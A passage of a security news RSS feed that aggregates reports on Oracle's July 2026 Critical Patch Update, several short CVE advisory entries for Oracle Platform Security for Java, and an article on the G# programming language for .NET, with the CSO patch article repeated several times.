<span data-contrast="auto">Only a few dozen of the vulnerabilities included in the release were credited to external security researchers. This indicates that the overwhelming majority of the discovered flaws were identified internally, likely with the assistance of AI-driven <a class="wpil_keyword_link" href="https://thecyberexpress.com/firewall-daily/vulnerabilities/" title="vulnerability" data-wpil-keyword-link="linked" data-wpil-monitor-id="29086">vulnerability</a> analysis.</span>

<span data-contrast="auto">Earlier this year, Oracle disclosed that it has access to leading artificial intelligence systems, including Anthropic's Claude Mythos and OpenAI's most capable models. According to the company, these <a href="https://thecyberexpress.com/cisa-first-chief-artificial-intelligence-officer/" target="_blank" rel="noopener">AI technologies</a> are being used to accelerate vulnerability discovery and improve the speed and accuracy of security patch development.</span><span data-ccp-props='{"134233117":false,"134233118":false,"201341983":0,"335551550":1,"335551620":1,"335559685":0,"335559737":0,"335559738":0,"335559739":160,"335559740":279}'> </span>

<span data-contrast="auto">Oracle also said it is applying this AI-driven vulnerability approach across its own software and cloud services, Oracle Health offerings, and the open source components that it both develops and depends on.</span>
<h3 aria-level="2"><b><span data-contrast="none">Organizations Urged to Apply the Oracle Security Patch Promptly</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">The release of the July 2026 Critical Patch Update comes amid continued efforts by <a href="https://thecyberexpress.com/cve-2026-41089-windows-netlogon-vulnerability/" target="_blank" rel="noopener">threat actors</a> to exploit vulnerabilities in enterprise software before organizations can deploy security updates.</span><span data-ccp-props='{"134233117":false,"134233118":false,"201341983":0,"335551550":1,"335551620":1,"335559685":0,"335559737":0,"335559738":0,"335559739":160,"335559740":279}'> </span>

<span data-contrast="auto">Oracle product vulnerabilities have previously been targeted in real-world attacks. The company cited examples that include the exploitation of a PeopleSoft zero-day vulnerability as well as a recently patched Oracle E-Business Suite (EBS) vulnerability.</span>

<span data-contrast="auto">Given the number of remotely exploitable and high-severity issues resolved in the Oracle security patch, organizations using affected Oracle products are advised to install the updates as soon as possible. Prompt deployment can help reduce exposure to attacks that take advantage of publicly known vulnerabilities before systems are secured.</span>

<span data-contrast="auto">With 1,449 security patches addressing 1,434 unique CVEs across 334 products, the July 2026 Critical Patch Update represents one of Oracle's most extensive quarterly security releases. </span><span data-ccp-props='{"134233117":false,"134233118":false,"201341983":0,"335551550":1,"335551620":1,"335559685":0,"335559737":0,"335559738":0,"335559739":160,"335559740":279}'> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-60455 | Oracle Platform Security for Java 12.2.1.4.0/14.1.2.0.0 Centralized Thirdparty Jars privileges management (EUVD-2026-47849)]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in Oracle Platform Security for Java 12.2.1.4.0/14.1.2.0.0. This vulnerability affects unknown code of the component Centralized Thirdparty Jars. Executing a manipulation can lead to improper privilege management.

This vulnerability is tracked a...]]></description>
<link>https://tsecurity.de/de/3687942/sicherheitsluecken/cve-2026-60455-oracle-platform-security-for-java-122140141200-centralized-thirdparty-jars-privileges-management-euvd-2026-47849/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687942/sicherheitsluecken/cve-2026-60455-oracle-platform-security-for-java-122140141200-centralized-thirdparty-jars-privileges-management-euvd-2026-47849/</guid>
<pubDate>Thu, 23 Jul 2026 06:10:59 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/oracle:platform_security_for_java">Oracle Platform Security for Java 12.2.1.4.0/14.1.2.0.0</a>. This vulnerability affects unknown code of the component <em>Centralized Thirdparty Jars</em>. Executing a manipulation can lead to improper privilege management.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2026-60455">CVE-2026-60455</a>. The attack can be launched remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-60371 | Oracle Platform Security for Java 12.2.1.4.0/14.1.2.0.0 Centralized Thirdparty Jars privileges management (EUVD-2026-47853)]]></title>
<description><![CDATA[A vulnerability has been found in Oracle Platform Security for Java 12.2.1.4.0/14.1.2.0.0 and classified as very critical. The impacted element is an unknown function of the component Centralized Thirdparty Jars. Performing a manipulation results in improper privilege management.

This vulnerabil...]]></description>
<link>https://tsecurity.de/de/3687941/sicherheitsluecken/cve-2026-60371-oracle-platform-security-for-java-122140141200-centralized-thirdparty-jars-privileges-management-euvd-2026-47853/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687941/sicherheitsluecken/cve-2026-60371-oracle-platform-security-for-java-122140141200-centralized-thirdparty-jars-privileges-management-euvd-2026-47853/</guid>
<pubDate>Thu, 23 Jul 2026 06:10:55 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/oracle:platform_security_for_java">Oracle Platform Security for Java 12.2.1.4.0/14.1.2.0.0</a> and classified as <a href="https://vuldb.com/kb/risk">very critical</a>. The impacted element is an unknown function of the component <em>Centralized Thirdparty Jars</em>. Performing a manipulation results in improper privilege management.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2026-60371">CVE-2026-60371</a>. Remote exploitation of the attack is possible. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-61246 | Oracle Platform Security for Java 12.2.1.4.0/14.1.2.0.0 Centralized Thirdparty Jars privileges management (EUVD-2026-47848)]]></title>
<description><![CDATA[A vulnerability marked as very critical has been reported in Oracle Platform Security for Java 12.2.1.4.0/14.1.2.0.0. This issue affects some unknown processing of the component Centralized Thirdparty Jars. The manipulation leads to improper privilege management.

This vulnerability is listed as ...]]></description>
<link>https://tsecurity.de/de/3687940/sicherheitsluecken/cve-2026-61246-oracle-platform-security-for-java-122140141200-centralized-thirdparty-jars-privileges-management-euvd-2026-47848/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687940/sicherheitsluecken/cve-2026-61246-oracle-platform-security-for-java-122140141200-centralized-thirdparty-jars-privileges-management-euvd-2026-47848/</guid>
<pubDate>Thu, 23 Jul 2026 06:10:50 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">very critical</a> has been reported in <a href="https://vuldb.com/product/oracle:platform_security_for_java">Oracle Platform Security for Java 12.2.1.4.0/14.1.2.0.0</a>. This issue affects some unknown processing of the component <em>Centralized Thirdparty Jars</em>. The manipulation leads to improper privilege management.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2026-61246">CVE-2026-61246</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-60372 | Oracle Platform Security for Java 12.2.1.4.0/14.1.2.0.0 Centralized Thirdparty Jars privileges management (EUVD-2026-47852)]]></title>
<description><![CDATA[A vulnerability was found in Oracle Platform Security for Java 12.2.1.4.0/14.1.2.0.0. It has been rated as critical. Affected by this vulnerability is an unknown functionality of the component Centralized Thirdparty Jars. This manipulation causes improper privilege management.

The identification...]]></description>
<link>https://tsecurity.de/de/3687889/sicherheitsluecken/cve-2026-60372-oracle-platform-security-for-java-122140141200-centralized-thirdparty-jars-privileges-management-euvd-2026-47852/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687889/sicherheitsluecken/cve-2026-60372-oracle-platform-security-for-java-122140141200-centralized-thirdparty-jars-privileges-management-euvd-2026-47852/</guid>
<pubDate>Thu, 23 Jul 2026 04:46:30 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/oracle:platform_security_for_java">Oracle Platform Security for Java 12.2.1.4.0/14.1.2.0.0</a>. It has been rated as <a href="https://vuldb.com/kb/risk">critical</a>. Affected by this vulnerability is an unknown functionality of the component <em>Centralized Thirdparty Jars</em>. This manipulation causes improper privilege management.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2026-60372">CVE-2026-60372</a>. It is possible to initiate the attack remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-60373 | Oracle Platform Security for Java 12.2.1.4.0/14.1.2.0.0 Centralized Thirdparty Jars privileges management (EUVD-2026-47851)]]></title>
<description><![CDATA[A vulnerability categorized as very critical has been discovered in Oracle Platform Security for Java 12.2.1.4.0/14.1.2.0.0. Affected by this issue is some unknown functionality of the component Centralized Thirdparty Jars. Such manipulation leads to improper privilege management.

This vulnerabi...]]></description>
<link>https://tsecurity.de/de/3687888/sicherheitsluecken/cve-2026-60373-oracle-platform-security-for-java-122140141200-centralized-thirdparty-jars-privileges-management-euvd-2026-47851/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687888/sicherheitsluecken/cve-2026-60373-oracle-platform-security-for-java-122140141200-centralized-thirdparty-jars-privileges-management-euvd-2026-47851/</guid>
<pubDate>Thu, 23 Jul 2026 04:46:29 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">very critical</a> has been discovered in <a href="https://vuldb.com/product/oracle:platform_security_for_java">Oracle Platform Security for Java 12.2.1.4.0/14.1.2.0.0</a>. Affected by this issue is some unknown functionality of the component <em>Centralized Thirdparty Jars</em>. Such manipulation leads to improper privilege management.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-60373">CVE-2026-60373</a>. It is possible to launch the attack remotely. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-60439 | Oracle Platform Security for Java 12.2.1.4.0/14.1.2.0.0 Centralized Thirdparty Jars privileges management (EUVD-2026-47850)]]></title>
<description><![CDATA[A vulnerability identified as critical has been detected in Oracle Platform Security for Java 12.2.1.4.0/14.1.2.0.0. This affects an unknown part of the component Centralized Thirdparty Jars. Performing a manipulation results in improper privilege management.

This vulnerability is identified as ...]]></description>
<link>https://tsecurity.de/de/3687887/sicherheitsluecken/cve-2026-60439-oracle-platform-security-for-java-122140141200-centralized-thirdparty-jars-privileges-management-euvd-2026-47850/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687887/sicherheitsluecken/cve-2026-60439-oracle-platform-security-for-java-122140141200-centralized-thirdparty-jars-privileges-management-euvd-2026-47850/</guid>
<pubDate>Thu, 23 Jul 2026 04:46:25 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">critical</a> has been detected in <a href="https://vuldb.com/product/oracle:platform_security_for_java">Oracle Platform Security for Java 12.2.1.4.0/14.1.2.0.0</a>. This affects an unknown part of the component <em>Centralized Thirdparty Jars</em>. Performing a manipulation results in improper privilege management.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2026-60439">CVE-2026-60439</a>. The attack can be initiated remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[G# language for .NET borrows from Go, Kotlin, and Swift]]></title>
<description><![CDATA[G# (GSharp) is moving forward as a programming language for Microsoft’s .NET platform, touted as bringing Go-, Kotlin-, and Swift-style ergonomics to the CLR (Common Language Runtime). The language is described by its creators as modern, simple, and accessible.



Although pre-1.0 and still growi...]]></description>
<link>https://tsecurity.de/de/3687865/ai-nachrichten/g-language-for-net-borrows-from-go-kotlin-and-swift/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687865/ai-nachrichten/g-language-for-net-borrows-from-go-kotlin-and-swift/</guid>
<pubDate>Thu, 23 Jul 2026 04:08:47 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"><a href="https://github.com/DavidObando/gsharp" data-type="link" data-id="https://github.com/DavidObando/gsharp">G# (GSharp)</a><strong> </strong>is moving forward as a programming language for Microsoft’s <a href="https://www.infoworld.com/article/2264488/what-is-the-net-framework-microsofts-answer-to-java.html">.NET</a> platform, touted as bringing <a href="https://www.infoworld.com/article/2253031/whats-the-go-language-really-good-for-3.html">Go</a>-, <a href="https://www.infoworld.com/article/2256390/what-is-kotlin-the-java-alternative-explained.html">Kotlin</a>-, and <a href="https://www.infoworld.com/article/4150248/swift-6-3-boosts-c-interoperability-android-sdk.html">Swift</a>-style ergonomics to the CLR (Common Language Runtime). The language is described by its creators as modern, simple, and accessible.</p>



<p class="wp-block-paragraph">Although pre-1.0 and still growing, G# aims to be for people who want a small, predictable language with direct access to the .NET ecosystem. Developers will see imports, <code>func</code>, structs, slices, maps, channels, <code>go</code>, <code>select</code>, and <code>for in</code> iteration. Also important are nullable flow, direct calls into the CLR (Common Language Runtime), and built-in concurrency. </p>



<p class="wp-block-paragraph">With G#, copyrighted in 2026, developers get value-oriented structs, reference-oriented classes, data structs, and data classes. For concurrency, G# uses <code>scope</code> for structured concurrency, <code>async func</code><strong> </strong>and <code>await</code><strong> </strong>for task-based asynchrony, and <code>async sequence[T]</code> for asynchronous streams. G# also makes use of the same <code>Task</code> and <code>Task[T]</code> types familiar from the .NET BCL (Base Class Library).</p>



<p class="wp-block-paragraph">G# documentation is <a href="https://davidobando.github.io/gsharp/" data-type="link" data-id="https://davidobando.github.io/gsharp/">available on the GitHub site</a> of Microsoft software engineer David Obando. “Every .NET type—your packages, third-party NuGet packages, the BCL—is callable from G# with the syntax you already know. CLR generics use G#’s bracket spelling, and method calls, properties, indexers, and <code>for in</code><strong> </strong>over <code>IEnumerable[T]</code> all just work,” according to the website.</p>



<p class="wp-block-paragraph">A Visual Studio Code extension for G3 can be found at <a href="https://marketplace.visualstudio.com/items?itemName=gsharplang.vscode-gsharp">marketplace.visualstudio.com</a>. The extension adds syntax highlighting, language server features, build/run commands, and debugger configuration for <code>.gs</code> and <code>.gsproj</code> files. Developers can install the extension from within VS Code (search for “G#” in the Extensions view) or from the command line.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Oracle’s July update fixes ten 10.0 vulnerabilities in Fusion Middleware]]></title>
<description><![CDATA[Oracle’s July 2026 Critical Patch Update, its largest ever, contains 1,449 new security patches spanning 32 product families, from Oracle Database and E-Business Suite to PeopleSoft, GoldenGate, Java SE, and Fusion Middleware.



Fusion Middleware was particularly hard hit, with new security patc...]]></description>
<link>https://tsecurity.de/de/3687351/ai-nachrichten/oracles-july-update-fixes-ten-100-vulnerabilities-in-fusion-middleware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687351/ai-nachrichten/oracles-july-update-fixes-ten-100-vulnerabilities-in-fusion-middleware/</guid>
<pubDate>Wed, 22 Jul 2026 20:52:40 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Oracle’s July 2026 Critical Patch Update, its largest ever, contains 1,449 new security patches spanning 32 product families, from Oracle Database and E-Business Suite to PeopleSoft, GoldenGate, Java SE, and Fusion Middleware.</p>



<p class="wp-block-paragraph">Fusion Middleware was particularly hard hit, with new security patches for 355 security vulnerabilities, 219 of them remotely exploitable without authentication, meaning they can be exploited over a network without requiring user credentials. Ten of them scored a “perfect” 10.0 on the Common Vulnerability Scoring System (CVSS).</p>



<p class="wp-block-paragraph">These included easily exploitable vulnerabilities allowing unauthenticated attackers with network access via HTTP to compromise Oracle Data Integrator, Oracle Access Manager, Oracle HTTP Server, Oracle Platform Security for Java, Oracle WebCenter Content, Service Delivery Platform, or Oracle Weblogic Server Proxy Plug-in,</p>



<p class="wp-block-paragraph">No other products were found to have quite such extreme vulnerabilities, but there were plenty of others scoring almost as badly.</p>



<h2 class="wp-block-heading">Two critical flaws in Oracle Database Server</h2>



<p class="wp-block-paragraph">The most severe flaw Oracle patched in its flagship database product is CVE-2026-61211, a vulnerability in the RDBMS component’s DBMS_CLOUD package with a CVSS score of 9.9.</p>



<p class="wp-block-paragraph">This easily exploitable vulnerability allows a low-privileged attacker having Execute DBMS_CLOUD privilege with network access via Oracle Net to compromise the RDBMS, <a href="https://www.oracle.com/security-alerts/cpujul2026verbose.html" target="_blank" rel="noreferrer noopener">Oracle said in the patch update statement</a>. “While the vulnerability is in RDBMS, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of RDBMS,” it warned.</p>



<p class="wp-block-paragraph">The flaw affects Database Server versions 19.3 through 19.31 and 23.4.0 through 23.26.2.</p>



<p class="wp-block-paragraph">Sanchit Vir Gogia, chief analyst at Greyhound Research, said the 9.9 score should be read as serious but conditional. Exposure depends on configuration, he said: On customer-managed databases, DBMS_CLOUD is absent until installed, and grants and network access lists determine the radius from there. “Where DBMS_CLOUD is broadly granted and reachable, the emergency is real and the window is seventy-two hours; where it is absent, the accelerated database wave will do.”</p>



<p class="wp-block-paragraph">Vibhum Dubey, a cybersecurity researcher and red teamer, said the flaw stood out to him because it checks several boxes that concern defenders.</p>



<p class="wp-block-paragraph">“Database servers often hold an organization’s most valuable data, so even if exploitation is not publicly observed yet, I don’t think this is the kind of issue you leave until the next routine maintenance window if your environment is exposed,” Dubey said.</p>



<p class="wp-block-paragraph">A second Database Server flaw, CVE-2026-47040, affects Connection Manager in Oracle Net Services, is remotely exploitable without credentials. Oracle’s risk matrix lists six Database Product vulnerabilities in this cycle as reachable over a network with no authentication required, the statement added.</p>



<p class="wp-block-paragraph">CVE-2026-7383, an OpenSSL-related TLS vulnerability, affects two products, Database Server and Autonomous Health Framework, since both bundle the same third-party component. Oracle’s advisory notes the Database Server patch for that CVE also resolves 19 related OpenSSL CVEs bundled into the same fix.</p>



<p class="wp-block-paragraph">Oracle GoldenGate received 27 new patches, nine of which do not require authentication to exploit, including CVE-2026-2332, a flaw in the Big Data and Application Adapters component tied to Eclipse Jetty, the statement added.</p>



<p class="wp-block-paragraph">There were also two critical flaws in Oracle’s TimesTen in-memory database.</p>



<p class="wp-block-paragraph">The remainder of the release spans E-Business Suite, WebLogic Server, PeopleSoft, Siebel, JD Edwards, Communications, Retail Applications, Utilities Applications, MySQL, Solaris and VM VirtualBox.</p>



<h2 class="wp-block-heading">Volume repair</h2>



<p class="wp-block-paragraph">Gogia said the volume itself marks a shift.</p>



<p class="wp-block-paragraph">“At 1,449 patches, against 481 in April 2026 and 309 a year earlier, patch load has outgrown the queue built to hold it,” he said. He recommended a tiered response: “The reachable and the reported inside seventy-two hours, the trusted core inside ten days, the rest by risk before the October release.”</p>



<p class="wp-block-paragraph">He also flagged a specific risk in how organizations might triage E-Business Suite. “Oracle’s advisory concedes that E-Business Suite exposure sits partly in underlying Database and Fusion Middleware versions outside the E-Business Suite matrix. The fastest way to mis-prioritise this release is to patch by product logo instead of trust boundary.”</p>



<h2 class="wp-block-heading">Third Tuesday, quarterly cycle</h2>



<p class="wp-block-paragraph">The July release is the third quarterly Critical Patch Update of 2026, and the first since the <a href="https://www.csoonline.com/article/4179473/oracles-first-monthly-patch-release-fixes-35-flaws-including-11-rated-critical.html">introduction in May</a> of the monthly Critical Security Patch Update program.</p>



<p class="wp-block-paragraph">Gogia said Oracle has effectively layered a second cadence on top of the existing one rather than replacing it.</p>



<p class="wp-block-paragraph">“Quarterly Critical Patch Updates remain and stay cumulative; monthly Critical Security Patch Updates now sit on top,” he said, adding that enterprise adoption of the new rhythm remains low because of “certification obligations, regression exposure and scarce specialist hours.”</p>



<p class="wp-block-paragraph">Dubey made a similar point about organizational readiness: “In large enterprises, patching is rarely a technical problem. It is an operational one. Database administrators, application owners, infrastructure teams, business stakeholders, and change advisory boards all have to align.”</p>



<p class="wp-block-paragraph">Niyati Daftary, principal analyst at Gartner, said the release underscores a broader shift in how patching is approached.</p>



<p class="wp-block-paragraph">“Patching is no longer a race to remediate every vulnerability. It is a discipline of identifying the exposures that matter most and reducing business risk as efficiently as possible,” she said, adding that organizations should prioritize based on exposure, business impact and exploitability, starting with internet-facing assets and mission-critical systems.</p>



<p class="wp-block-paragraph">Daftary pointed to continuous threat exposure management and adversarial exposure validation as increasingly relevant frameworks, since CVSS scores “measure theoretical severity rather than actual enterprise risk.” Patching alone will not be sufficient, Daftary said, and organizations should continue investing in defense in depth, including behavioral threat detection and incident response.</p>



<p class="wp-block-paragraph">Oracle’s next cumulative Critical Patch Update will come on Oct. 20, 2026, with smaller Critical Security Patch Updates on Aug. 18 and Sept. 15.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.csoonline.com/article/4200184/oracles-july-update-fixes-ten-10-0-vulnerabilities-in-fusion-middleware.html">CSO</a>.</em></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Oracle’s July update fixes ten 10.0 vulnerabilities in Fusion Middleware]]></title>
<description><![CDATA[Oracle’s July 2026 Critical Patch Update, its largest ever, contains 1,449 new security patches spanning 32 product families, from Oracle Database and E-Business Suite to PeopleSoft, GoldenGate, Java SE, and Fusion Middleware.



Fusion Middleware was particularly hard hit, with new security patc...]]></description>
<link>https://tsecurity.de/de/3687303/it-security-nachrichten/oracles-july-update-fixes-ten-100-vulnerabilities-in-fusion-middleware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687303/it-security-nachrichten/oracles-july-update-fixes-ten-100-vulnerabilities-in-fusion-middleware/</guid>
<pubDate>Wed, 22 Jul 2026 20:33:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Oracle’s July 2026 Critical Patch Update, its largest ever, contains 1,449 new security patches spanning 32 product families, from Oracle Database and E-Business Suite to PeopleSoft, GoldenGate, Java SE, and Fusion Middleware.</p>



<p class="wp-block-paragraph">Fusion Middleware was particularly hard hit, with new security patches for 355 security vulnerabilities, 219 of them remotely exploitable without authentication, meaning they can be exploited over a network without requiring user credentials. Ten of them scored a “perfect” 10.0 on the Common Vulnerability Scoring System (CVSS).</p>



<p class="wp-block-paragraph">These included easily exploitable vulnerabilities allowing unauthenticated attackers with network access via HTTP to compromise Oracle Data Integrator, Oracle Access Manager, Oracle HTTP Server, Oracle Platform Security for Java, Oracle WebCenter Content, Service Delivery Platform, or Oracle Weblogic Server Proxy Plug-in,</p>



<p class="wp-block-paragraph">No other products were found to have quite such extreme vulnerabilities, but there were plenty of others scoring almost as badly.</p>



<h2 class="wp-block-heading">Two critical flaws in Oracle Database Server</h2>



<p class="wp-block-paragraph">The most severe flaw Oracle patched in its flagship database product is CVE-2026-61211, a vulnerability in the RDBMS component’s DBMS_CLOUD package with a CVSS score of 9.9.</p>



<p class="wp-block-paragraph">This easily exploitable vulnerability allows a low-privileged attacker having Execute DBMS_CLOUD privilege with network access via Oracle Net to compromise the RDBMS, <a href="https://www.oracle.com/security-alerts/cpujul2026verbose.html" target="_blank" rel="noreferrer noopener">Oracle said in the patch update statement</a>. “While the vulnerability is in RDBMS, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of RDBMS,” it warned.</p>



<p class="wp-block-paragraph">The flaw affects Database Server versions 19.3 through 19.31 and 23.4.0 through 23.26.2.</p>



<p class="wp-block-paragraph">Sanchit Vir Gogia, chief analyst at Greyhound Research, said the 9.9 score should be read as serious but conditional. Exposure depends on configuration, he said: On customer-managed databases, DBMS_CLOUD is absent until installed, and grants and network access lists determine the radius from there. “Where DBMS_CLOUD is broadly granted and reachable, the emergency is real and the window is seventy-two hours; where it is absent, the accelerated database wave will do.”</p>



<p class="wp-block-paragraph">Vibhum Dubey, a cybersecurity researcher and red teamer, said the flaw stood out to him because it checks several boxes that concern defenders.</p>



<p class="wp-block-paragraph">“Database servers often hold an organization’s most valuable data, so even if exploitation is not publicly observed yet, I don’t think this is the kind of issue you leave until the next routine maintenance window if your environment is exposed,” Dubey said.</p>



<p class="wp-block-paragraph">A second Database Server flaw, CVE-2026-47040, affects Connection Manager in Oracle Net Services, is remotely exploitable without credentials. Oracle’s risk matrix lists six Database Product vulnerabilities in this cycle as reachable over a network with no authentication required, the statement added.</p>



<p class="wp-block-paragraph">CVE-2026-7383, an OpenSSL-related TLS vulnerability, affects two products, Database Server and Autonomous Health Framework, since both bundle the same third-party component. Oracle’s advisory notes the Database Server patch for that CVE also resolves 19 related OpenSSL CVEs bundled into the same fix.</p>



<p class="wp-block-paragraph">Oracle GoldenGate received 27 new patches, nine of which do not require authentication to exploit, including CVE-2026-2332, a flaw in the Big Data and Application Adapters component tied to Eclipse Jetty, the statement added.</p>



<p class="wp-block-paragraph">There were also two critical flaws in Oracle’s TimesTen in-memory database.</p>



<p class="wp-block-paragraph">The remainder of the release spans E-Business Suite, WebLogic Server, PeopleSoft, Siebel, JD Edwards, Communications, Retail Applications, Utilities Applications, MySQL, Solaris and VM VirtualBox.</p>



<h2 class="wp-block-heading">Volume repair</h2>



<p class="wp-block-paragraph">Gogia said the volume itself marks a shift.</p>



<p class="wp-block-paragraph">“At 1,449 patches, against 481 in April 2026 and 309 a year earlier, patch load has outgrown the queue built to hold it,” he said. He recommended a tiered response: “The reachable and the reported inside seventy-two hours, the trusted core inside ten days, the rest by risk before the October release.”</p>



<p class="wp-block-paragraph">He also flagged a specific risk in how organizations might triage E-Business Suite. “Oracle’s advisory concedes that E-Business Suite exposure sits partly in underlying Database and Fusion Middleware versions outside the E-Business Suite matrix. The fastest way to mis-prioritise this release is to patch by product logo instead of trust boundary.”</p>



<h2 class="wp-block-heading">Third Tuesday, quarterly cycle</h2>



<p class="wp-block-paragraph">The July release is the third quarterly Critical Patch Update of 2026, and the first since the <a href="https://www.csoonline.com/article/4179473/oracles-first-monthly-patch-release-fixes-35-flaws-including-11-rated-critical.html">introduction in May</a> of the monthly Critical Security Patch Update program.</p>



<p class="wp-block-paragraph">Gogia said Oracle has effectively layered a second cadence on top of the existing one rather than replacing it.</p>



<p class="wp-block-paragraph">“Quarterly Critical Patch Updates remain and stay cumulative; monthly Critical Security Patch Updates now sit on top,” he said, adding that enterprise adoption of the new rhythm remains low because of “certification obligations, regression exposure and scarce specialist hours.”</p>



<p class="wp-block-paragraph">Dubey made a similar point about organizational readiness: “In large enterprises, patching is rarely a technical problem. It is an operational one. Database administrators, application owners, infrastructure teams, business stakeholders, and change advisory boards all have to align.”</p>



<p class="wp-block-paragraph">Niyati Daftary, principal analyst at Gartner, said the release underscores a broader shift in how patching is approached.</p>



<p class="wp-block-paragraph">“Patching is no longer a race to remediate every vulnerability. It is a discipline of identifying the exposures that matter most and reducing business risk as efficiently as possible,” she said, adding that organizations should prioritize based on exposure, business impact and exploitability, starting with internet-facing assets and mission-critical systems.</p>



<p class="wp-block-paragraph">Daftary pointed to continuous threat exposure management and adversarial exposure validation as increasingly relevant frameworks, since CVSS scores “measure theoretical severity rather than actual enterprise risk.” Patching alone will not be sufficient, Daftary said, and organizations should continue investing in defense in depth, including behavioral threat detection and incident response.</p>



<p class="wp-block-paragraph">Oracle’s next cumulative Critical Patch Update will come on Oct. 20, 2026, with smaller Critical Security Patch Updates on Aug. 18 and Sept. 15.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.csoonline.com/article/4200184/oracles-july-update-fixes-ten-10-0-vulnerabilities-in-fusion-middleware.html">CSO</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Oracle’s July update fixes ten 10.0 vulnerabilities in Fusion Middleware]]></title>
<description><![CDATA[Oracle’s July 2026 Critical Patch Update, its largest ever, contains 1,449 new security patches spanning 32 product families, from Oracle Database and E-Business Suite to PeopleSoft, GoldenGate, Java SE, and Fusion Middleware.



Fusion Middleware was particularly hard hit, with new security patc...]]></description>
<link>https://tsecurity.de/de/3687241/it-security-nachrichten/oracles-july-update-fixes-ten-100-vulnerabilities-in-fusion-middleware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687241/it-security-nachrichten/oracles-july-update-fixes-ten-100-vulnerabilities-in-fusion-middleware/</guid>
<pubDate>Wed, 22 Jul 2026 20:24:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Oracle’s July 2026 Critical Patch Update, its largest ever, contains 1,449 new security patches spanning 32 product families, from Oracle Database and E-Business Suite to PeopleSoft, GoldenGate, Java SE, and Fusion Middleware.</p>



<p class="wp-block-paragraph">Fusion Middleware was particularly hard hit, with new security patches for 355 security vulnerabilities, 219 of them remotely exploitable without authentication, meaning they can be exploited over a network without requiring user credentials. Ten of them scored a “perfect” 10.0 on the Common Vulnerability Scoring System (CVSS).</p>



